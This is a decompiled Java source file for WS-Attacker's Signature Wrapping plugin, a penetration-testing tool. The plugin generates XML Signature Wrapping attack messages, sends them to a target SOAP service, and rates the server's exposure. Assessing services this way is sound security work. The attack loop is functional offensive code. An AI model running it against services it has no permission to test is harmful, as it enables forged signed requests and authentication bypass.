/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.signatureWrapping;

import com.eviware.soapui.impl.wsdl.WsdlRequest;
import com.eviware.soapui.impl.wsdl.support.soap.SoapUtils;
import com.eviware.soapui.impl.wsdl.support.soap.SoapVersion;
import java.io.File;
import java.io.IOException;
import java.util.List;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.xml.xpath.XPathExpressionException;
import org.apache.xmlbeans.XmlException;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.xml.sax.SAXException;
import wsattacker.http.transport.SoapHttpClient;
import wsattacker.http.transport.SoapHttpClientFactory;
import wsattacker.http.transport.SoapResponse;
import wsattacker.library.schemaanalyzer.SchemaAnalyzer;
import wsattacker.library.schemaanalyzer.SchemaAnalyzerFactory;
import wsattacker.library.signatureWrapping.option.Payload;
import wsattacker.library.signatureWrapping.util.exception.InvalidWeaknessException;
import wsattacker.library.signatureWrapping.util.signature.SignatureManager;
import wsattacker.library.signatureWrapping.xpath.weakness.util.WeaknessLog;
import wsattacker.library.signatureWrapping.xpath.wrapping.WrappingOracle;
import wsattacker.library.xmlutilities.dom.DomUtilities;
import wsattacker.main.composition.plugin.AbstractPlugin;
import wsattacker.main.composition.plugin.PluginFunctionInterface;
import wsattacker.main.composition.testsuite.CurrentRequestContentChangeObserver;
import wsattacker.main.composition.testsuite.RequestResponsePair;
import wsattacker.main.plugin.PluginState;
import wsattacker.main.testsuite.TestSuite;
import wsattacker.plugin.signatureWrapping.function.postanalyze.SignatureWrappingAnalyzeFunction;
import wsattacker.plugin.signatureWrapping.function.postanalyze.model.AnalysisDataCollector;
import wsattacker.plugin.signatureWrapping.option.OptionManager;

public class SignatureWrapping
extends AbstractPlugin {
    public static final String ANALYSISDATA_SUCCESSFUL_STRING = "Successful Attack";
    public static final String ANALYSISDATA_NOFAULT_STRING = "No Fault Response";
    public static final String ANALYSISDATA_NULL_STRING = "NULL Response";
    public static final String ANALYSISDATA_NONXML_STRING = "Non XML Response";
    private static final long serialVersionUID = 1L;
    private static final String NAME = "Signature Wrapping";
    private static final String AUTHOR = "Christian Mainka";
    private static final String[] CATEGORY = new String[]{"Security", "Signature"};
    private static final String VERSION = "1.6 / 2015-05-20";
    private SignatureManager signatureManager;
    private OptionManager optionManager;
    private SchemaAnalyzer schemaAnalyser;
    private SchemaAnalyzer usedSchemaAnalyser;
    private WrappingOracle wrappingOracle;
    private AnalysisDataCollector analysisData;
    private final int successThreashold = 70;
    private String originalSoapAction = null;

    public void initializePlugin() {
        this.initData();
        this.usedSchemaAnalyser = this.schemaAnalyser = SchemaAnalyzerFactory.getInstance((String)"ALL");
        this.signatureManager = new SignatureManager();
        this.optionManager = OptionManager.getInstance();
        this.optionManager.setPlugin(this);
        this.optionManager.setSignatureManager(this.signatureManager);
        this.analysisData = new AnalysisDataCollector();
        this.setPluginFunctions(new PluginFunctionInterface[]{new SignatureWrappingAnalyzeFunction(this)});
        TestSuite.getInstance().getCurrentRequest().addCurrentRequestContentObserver((CurrentRequestContentChangeObserver)this.optionManager);
    }

    public void initData() {
        this.setName(NAME);
        this.setAuthor(AUTHOR);
        this.setCategory(CATEGORY);
        this.setVersion(VERSION);
        StringBuilder description = new StringBuilder();
        description.append("<html><p>Tries several XML Signature Wrapping techniques to invoke a Service with unsigned content.</p>");
        description.append("<p>Currently supported techniques:</p><ul>");
        description.append("<li>Attack ID References.</li>");
        description.append("<li>Abuse descendant* Axis, e.g. double-slash in XPath.</li>");
        description.append("<li>Abuse attribute expressions in XPaths.</li>");
        description.append("<li>Try namespace-injection attack to attack prefixes in XPaths.</li>");
        description.append("</ul><p>At least one signed part needs some valid XML payload, otherwise the plugin is <i>not configured</i>.</p></html>");
        this.setDescription(description.toString());
    }

    public void setUsedSchemaFiles(List<File> fileList) {
        this.log().info((Object)"Cleared all Schemas");
        this.schemaAnalyser = SchemaAnalyzerFactory.getInstance((String)"EMPTY");
        for (File f : fileList) {
            try {
                Document schema = DomUtilities.readDocument((File)f);
                this.log().info((Object)("Adding Schema " + f.getName()));
                this.schemaAnalyser.appendSchema(schema);
            }
            catch (Exception e) {
                this.log().warn((Object)("Could not read Schema file '" + f.getName() + "'"));
            }
        }
    }

    public void setSchemaAnalyzerDepdingOnOption() {
        this.usedSchemaAnalyser = this.optionManager.getOptionNoSchema().isOn() ? SchemaAnalyzerFactory.getInstance((String)"NULL") : this.schemaAnalyser;
    }

    protected void attackImplementationHook(RequestResponsePair original) {
        this.analysisData = new AnalysisDataCollector();
        this.wrappingOracle = new WrappingOracle(this.signatureManager.getDocument(), this.signatureManager.getPayloads(), this.usedSchemaAnalyser);
        int signedElements = this.wrappingOracle.getCountSignedElements();
        int elementsByID = this.wrappingOracle.getCountElementsReferedByID();
        int elementsByXPath = this.wrappingOracle.getCountElementsReferedByXPath();
        int elementsByFastXPath = this.wrappingOracle.getCountElementsReferedByFastXPath();
        int elementsByPrefixfreeTransformedFastXPath = this.wrappingOracle.getCountElementsReferedByPrefixfreeTransformedFastXPath();
        this.important(String.format("%d signed Elements:\n--> %d by ID\n--> %d by XPath\n  `--> %d by FastXPath\n  `--> %d by prefix free FastXPath (best)", signedElements, elementsByID, elementsByXPath, elementsByFastXPath, elementsByPrefixfreeTransformedFastXPath));
        String searchString = this.optionManager.getOptionTheContainedString().getValue();
        boolean search = !searchString.isEmpty() && this.optionManager.getOptionMustContainString().isOn();
        SoapHttpClient client = SoapHttpClientFactory.createSoapHttpClient((WsdlRequest)original.getWsdlRequest());
        int successCounter = 0;
        int max = this.wrappingOracle.maxPossibilities();
        this.info("Found " + max + " wrapping possibilites.");
        for (int i = 0; i < max; ++i) {
            String responseContent;
            String attackDocumentAsString;
            block35: {
                SoapResponse response;
                Document attackDocument;
                this.info("Trying possibility " + (i + 1) + "/" + max);
                try {
                    attackDocument = this.wrappingOracle.getPossibility(i);
                }
                catch (InvalidWeaknessException e) {
                    this.log().warn((Object)("Could not abuse the weakness. " + e.getMessage()));
                    continue;
                }
                catch (Exception e) {
                    this.log().error((Object)("Unknown error. " + e.getMessage()));
                    continue;
                }
                this.info(WeaknessLog.representation());
                attackDocumentAsString = DomUtilities.domToString((Document)attackDocument);
                try {
                    response = client.sendSoap(attackDocumentAsString);
                }
                catch (IOException ex) {
                    this.log().warn((Object)"Could not submit the request. Trying next one. ", (Throwable)ex);
                    continue;
                }
                responseContent = null;
                if (response != null) {
                    responseContent = response.getBody();
                } else {
                    this.info("Error: Got empty SOAP response.");
                }
                if (responseContent == null) {
                    this.trace("Request:\n" + DomUtilities.showOnlyImportant((String)attackDocumentAsString));
                    this.important("The server's answer was empty. Server misconfiguration?");
                    this.analysisData.add(ANALYSISDATA_NULL_STRING, i, "");
                    continue;
                }
                try {
                    SoapVersion soapVersion = original.getWsdlRequest().getOperation().getInterface().getSoapVersion();
                    if (SoapUtils.isSoapFault((String)responseContent, (SoapVersion)soapVersion)) {
                        this.trace("Request:\n" + DomUtilities.showOnlyImportant((String)attackDocumentAsString));
                        this.info("Server does not accept the message, you got a SOAP error.");
                        this.trace("Response:\n" + DomUtilities.showOnlyImportant((String)responseContent));
                        String xpath = soapVersion.equals(SoapVersion.Soap11) ? "/*[local-name()='Envelope'][1]/*[local-name()='Body'][1]/*[local-name()='Fault'][1]/*[local-name()='faultstring'][1]" : "/*[local-name()='Envelope'][1]/*[local-name()='Body'][1]/*[local-name()='Fault'][1]/*[local-name()='Reason'][1]/*[local-name()='Text'][1]";
                        try {
                            Document doc = DomUtilities.stringToDom((String)responseContent);
                            try {
                                List match = DomUtilities.evaluateXPath((Document)doc, (String)xpath);
                                StringBuilder sb = new StringBuilder();
                                for (Element ele : match) {
                                    sb.append(ele.getTextContent()).append(" ");
                                }
                                if (sb.length() <= 0) continue;
                                this.analysisData.add(sb.toString(), i, responseContent);
                            }
                            catch (XPathExpressionException ex) {
                                Logger.getLogger(SignatureWrapping.class.getName()).log(Level.SEVERE, null, ex);
                            }
                            continue;
                        }
                        catch (SAXException ex) {
                            Logger.getLogger(SignatureWrapping.class.getName()).log(Level.SEVERE, null, ex);
                        }
                    }
                    break block35;
                }
                catch (XmlException e) {
                    this.trace("Request:\n" + DomUtilities.showOnlyImportant((String)attackDocumentAsString));
                    this.info("The answer is not valid XML. Server missconfiguration?");
                    this.analysisData.add(ANALYSISDATA_NONXML_STRING, i, responseContent);
                }
                continue;
            }
            if (search) {
                int index = responseContent.indexOf(searchString);
                if (index < 0) {
                    this.info("The answer does not contain the searchstring:\n" + searchString);
                    this.analysisData.add(ANALYSISDATA_NOFAULT_STRING, i, responseContent);
                    continue;
                }
                this.important("The answer contains the searchstring:\n" + searchString);
                this.analysisData.add(ANALYSISDATA_SUCCESSFUL_STRING, i, responseContent);
            } else {
                this.analysisData.add(ANALYSISDATA_SUCCESSFUL_STRING, i, responseContent);
            }
            this.critical("Server Accepted the Request with Possibility " + (i + 1) + ".");
            this.important(String.format("Attack-Vector:\n\n%s\nRequest:\n%s", WeaknessLog.representation(), DomUtilities.showOnlyImportant((String)attackDocumentAsString)));
            this.info("Response:\n" + DomUtilities.showOnlyImportant((String)responseContent));
            this.setCurrentPoints(this.getMaxPoints());
            ++successCounter;
            if (this.optionManager.getAbortOnFirstSuccess().isOn()) break;
        }
        String message = "";
        if (this.getCurrentPoints() >= 70) {
            message = "CRITICAL: Server could be successfully attacked!";
        } else if (signedElements == elementsByPrefixfreeTransformedFastXPath) {
            this.setCurrentPoints(0);
            message = "Everything is Okay: Server uses transformed prefix-free FastXPath. Best practices.";
        } else if (signedElements == elementsByFastXPath) {
            this.setCurrentPoints(10);
            message = "Good: Server uses FastXPath.";
        } else if (signedElements == elementsByXPath) {
            this.setCurrentPoints(20);
            message = "Okay: Server uses XPaths, but could not be successfully attacked.";
        } else if (elementsByXPath > 0 && elementsByID > 0) {
            this.setCurrentPoints(20);
            message = "Warning: Server uses ID References and XPaths mixed. Only XPaths are recommended.";
        } else if (signedElements == elementsByID) {
            this.setCurrentPoints(20);
            message = "Warning: Server uses ID References but could not be successfully attacked.";
        } else {
            message = "### This is a not expected result";
        }
        if (this.getCurrentPoints() < 70) {
            this.important(message);
        } else {
            this.critical(message);
        }
        if (successCounter > 0 && !this.optionManager.getAbortOnFirstSuccess().isOn()) {
            this.important(String.format("Found %d of %d working XSW messages.", successCounter, max));
        }
    }

    public boolean wasSuccessful() {
        return this.isFinished() && this.getCurrentPoints() >= 70;
    }

    public void checkState() {
        this.log().debug((Object)"### CHECK_STATE");
        List list = this.signatureManager.getPayloads();
        if (list.isEmpty()) {
            this.log().debug((Object)"### List Empty -> Not_Configured");
            this.setState(PluginState.Not_Configured);
        } else {
            for (Payload payload : list) {
                if (this.log().isDebugEnabled()) {
                    this.log().debug((Object)String.format("### Checking Option %s", payload.toString()));
                }
                if (!payload.isTimestamp() && !payload.hasPayload()) continue;
                this.setState(PluginState.Ready);
                return;
            }
            this.log().debug((Object)"### Finally -> Not_Configured");
            this.setState(PluginState.Not_Configured);
        }
    }

    public void clean() {
        this.setCurrentPoints(0);
        this.checkState();
    }

    public void stopHook() {
    }

    public SignatureManager getSignatureManager() {
        return this.signatureManager;
    }

    public SchemaAnalyzer getUsedSchemaAnalyser() {
        return this.usedSchemaAnalyser;
    }

    public AnalysisDataCollector getAnalysisData() {
        return this.analysisData;
    }

    public void setAnalysisData(AnalysisDataCollector testData) {
        this.analysisData = testData;
    }

    public WrappingOracle getWrappingOracle() {
        return this.wrappingOracle;
    }
}

